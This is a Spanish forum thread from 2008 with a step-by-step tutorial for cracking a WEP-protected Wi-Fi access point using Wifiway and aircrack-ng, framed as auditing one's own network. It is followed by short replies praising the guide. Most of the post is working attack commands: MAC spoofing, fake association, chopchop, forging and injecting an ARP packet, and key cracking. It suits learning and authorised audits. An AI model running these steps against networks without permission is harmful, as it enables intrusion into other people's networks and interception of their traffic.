Seguridad Wireless - Wifi
Suite Seguridad Wireless => Manuales de Wifislax & Wifiway => Mensaje iniciado por: manel en 21-11-2008, 15:17 (Viernes)
-
Buenas,
Lo poco que se de auditoria lo he aprendido en este foro. Si puedo quitar algo de trabajo a los que lo hacen posible , me daré por satisfecho. Gracias por vuestra paciencia >:( >:( >:(
El tuto está hecho con wifiway 1.0, pero puede servir cualquier versión de wifislax.
Puntualizar que el chop-chop no siempre funciona, pero al forjar nosotros el arp, la inyección es inmediata.
Al lio:
Los drivers de inyección de la bosslan/alfa ya vienen cargados.
Abrimos una consola y tecleamos:
#iwconfig
(http://lh4.ggpht.com/_KYzSJhgVMKU/SSF91IOSxKI/AAAAAAAAAEA/42xCCT8y9uc/s800/snapshot1.png) (http://picasaweb.google.es/lh/photo/v7ztsps7TYGA8lcv_Mcl-g)
Copiamos nuestra iface, en este caso wlan0. Vamos a cambiarle la mac:
#macchanger -m 00:01:02:03:04:05 wlan0
El sistema responde:
(http://lh6.ggpht.com/_KYzSJhgVMKU/SSK6gLyj9ZI/AAAAAAAAAGk/rQpJP-7taxI/s800/snapshot2.png) (http://picasaweb.google.es/lh/photo/PK2EitHW1FSbM6ZJvbxCqg)
Ponemos la tarjeta en modo monitor:
#airmon-ng start wlan0
El sistema responde:
(http://lh6.ggpht.com/_KYzSJhgVMKU/SSF91eqP2EI/AAAAAAAAAEQ/Kb1Y0AP7WQA/s800/snapshot3.png) (http://picasaweb.google.es/lh/photo/bcy58yS0H1wkkkaHYosgtQ)
Tenemos todo a punto, lanzamos el airodump para ver nuestro AP.
Tecleamos:
#airodump-ng wlan0
Veremos una lista de los AP:
(http://lh4.ggpht.com/_KYzSJhgVMKU/SSLCiHcVh1I/AAAAAAAAAHM/BBtsVDnQvUc/s800/snapshot4.png) (http://picasaweb.google.es/lh/photo/XhiINsHV7_DFnvhOrDJcRw)
Cuando veamos nuestro AP en la lista pulsamos Ctrl + c, se nos parará el airodump, nos fijaremos en el BSSID (MAC de nuestro AP), el canal y el ESSID (nombre de nuestro AP).
Ahora volveremos a abrir el airodump con las opciones: -c (para filtrar por canal), la opción -b (filtrar por BSSID) y la opción -w para que nos cree un archivo donde se nos guardarán los ivs. El nombre del archivo puede ser cualquiera.
#airodump-ng -c [nº_canal] -b [bssid] -w [nombre_archivo] [iface]
En nuestro caso:
#airodump-ng -c 9 -b 00:02:CF:XX:XX:XX -w captura wlan0
El sistema responde:
(http://lh3.ggpht.com/_KYzSJhgVMKU/SSLCigN-tAI/AAAAAAAAAHU/RQUOtP1AY90/s800/snapshot5.png) (http://picasaweb.google.es/lh/photo/ROLpb78jAWpbHKkgRDcjhQ)
Lo dejamos abierto, abrimos otra consola para asociarnos al AP, ataque 1 ó asociación falsa:
#aireplay-ng -1 10 -a [bssid] -h [mac_nuestra_tarjeta] [iface]
Nuestro ejemplo:
#aireplay-ng -1 10 -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 wlan0
Si todo va bien, tenemos que ver esto:
(http://lh5.ggpht.com/_KYzSJhgVMKU/SSMOghsXHoI/AAAAAAAAAIY/y1nnqE_n-Ig/s800/snapshot6.png) (http://picasaweb.google.es/lh/photo/i3QbRuQeR8oRPasR34bWyw)
Una vez asociados, dejamos la consola abierta y abrimos otra donde lanzaremos el ataque 4 (chopchop), para conseguir un paquete de datos WEP:
#aireplay-ng -4 -h [mac_nuestra_tarjeta] [iface]
Sigamos con nuestro ejemplo:
#aireplay-ng -4 -h 00:01:02:03:04:05 wlan0
Puede tardar más o menos pero nos tiene que salir algo así:
(http://lh4.ggpht.com/_KYzSJhgVMKU/SSMOhNPAsXI/AAAAAAAAAIg/jTMGVCREErU/s800/snapshot7.png) (http://picasaweb.google.es/lh/photo/oCvkSlZhA1TLvizj1orv2w)
Nos pregunta si queremos utilizar este paquete, le decimos que y.
(http://lh5.ggpht.com/_KYzSJhgVMKU/SSF-QV-22rI/AAAAAAAAAE8/mdm7qenftUo/s800/snapshot8.png) (http://picasaweb.google.es/lh/photo/z1-RGXvyyzwnSoVnvtfoWg)
Nos ha creado dos archivos, uno .cap y otro .xor.
Abriremos el .cap con el tcpdump para ver la ip de nuestro AP.
#tcpdump -s 0 -n -e -r [archivo.cap]
En nuestro caso:
#tcpdump -s 0 -n -e -r replay_dec-1117-143113.cap
Nos responde:
(http://lh4.ggpht.com/_KYzSJhgVMKU/SSMOhAsQFdI/AAAAAAAAAIo/3ZTiszN868Y/s800/snapshot9.png) (http://picasaweb.google.es/lh/photo/nAOd3QNh4eeUWIxaqy5zQg)
Vemos la ip del AP: 192.168.1.1 (el 520 no se lo que es), pero siempre serán los cuatro primeros números.
Ahora con el packetforge vamos a forjar un arp para poder inyectarlo:
#packetforge-ng -0 -a [bssid] -h [mac_nuestra_tarjeta] -k [ip_origen] -l [ip_destino] -y [archivo.xor] -w [nombre_arp_que_creamos]
La ip de origen puede ser cualquiera dentro del rango, la de destino tiene que ser la del AP, y -w sera el arp, ponemos cualquier nombre.En nuestro caso:
#packetforge-ng -0 -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 -k 192.168.1.255 -l 192.168.1.1 -y replay_dec-1117-143113.xor -w arp
(http://lh6.ggpht.com/_KYzSJhgVMKU/SSMOhQwhmqI/AAAAAAAAAIw/Xi4zi4ByZqg/s800/snapshot10.png) (http://picasaweb.google.es/lh/photo/9pjy_Cj2rIJ-fWNvW8eSPA)
Wrote packet to: arp, ya tenemos nuestro arp.
Ahora vamos a inyectarlo con aireplay-ng -2:
#aireplay-ng -2 -h [mac_nuestra_tarjeta] -r [archivo_arp] [iface]
Nosotros le añadimos la opción -x 1024, para que inyecte 1024 paquetes por segundo, por defecto son 600 (creo). Algunos AP se saturan al inyectar a 1024, o pude que incluso se bloqueen con la opción por defecto, (600), si vemos que al lanzar el A2 empieza a inyectar, y se para a los pocos segundos, relanzaremos el A2 añadiendo la opción -x 300.
#aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r arp wlan0
(http://lh4.ggpht.com/_KYzSJhgVMKU/SSMOhsxymFI/AAAAAAAAAI4/A72auV8rgiU/s800/snapshot11.png) (http://picasaweb.google.es/lh/photo/NhJ-9ZDE5_tnek4KN6Bu8w)
Le respondemos que y , y si nada ha fallado ya estamos inyectando.
Nos vamos al airodump y lo comprobamos:
(http://lh4.ggpht.com/_KYzSJhgVMKU/SSMPJXHHCII/AAAAAAAAAJA/5ICWFMrWsPw/s800/snapshot12.png) (http://picasaweb.google.es/lh/photo/8FEaiIqFxICnycc3RJUvbA)
Solo nos queda esperar que suban los #data y lanzar el aircrack. A diferencia del A3, aquí no nos suben los arp, por tanto el ptw no nos sirve. necesitaremos más #data. Sin cerrar nada, abrimos otra consola y lanzamos el aircrack:
#aircrack [archivo_captura]-01.cap
Nosotros:
#aircrack captura-01.cap
(http://lh4.ggpht.com/_KYzSJhgVMKU/SSMPJ2SRd5I/AAAAAAAAAJI/r_Ix_rGMmio/s800/snapshot14.png) (http://picasaweb.google.es/lh/photo/3a3q3ChCp685iAkrPBvGwg)
Suerte y paciencia...
-
lo unico que puedo decir es :
>:( >:( >:(felicitaciones gran tuto >:( >:( >:( >:(
esta todo muy bien detallado
se agradece demasiado >:( >:(
saludos
-
si señor , un tutorial genial , gracias! ;)
-
;) ;) ;)
Un saludo
-
muy bueno ....solo un detalle de estos manuales graficos..que cuando caen los servers de hosting de imgenes n6 se entiende na
>:(
-
Buenas:
Los he subido a picassa, espero que duren...
Un saludo
-
buena guia >:( >:( >:(
le pongo una chincheta ;)
saludos
-
he mandado esta guia a la seccion de manuales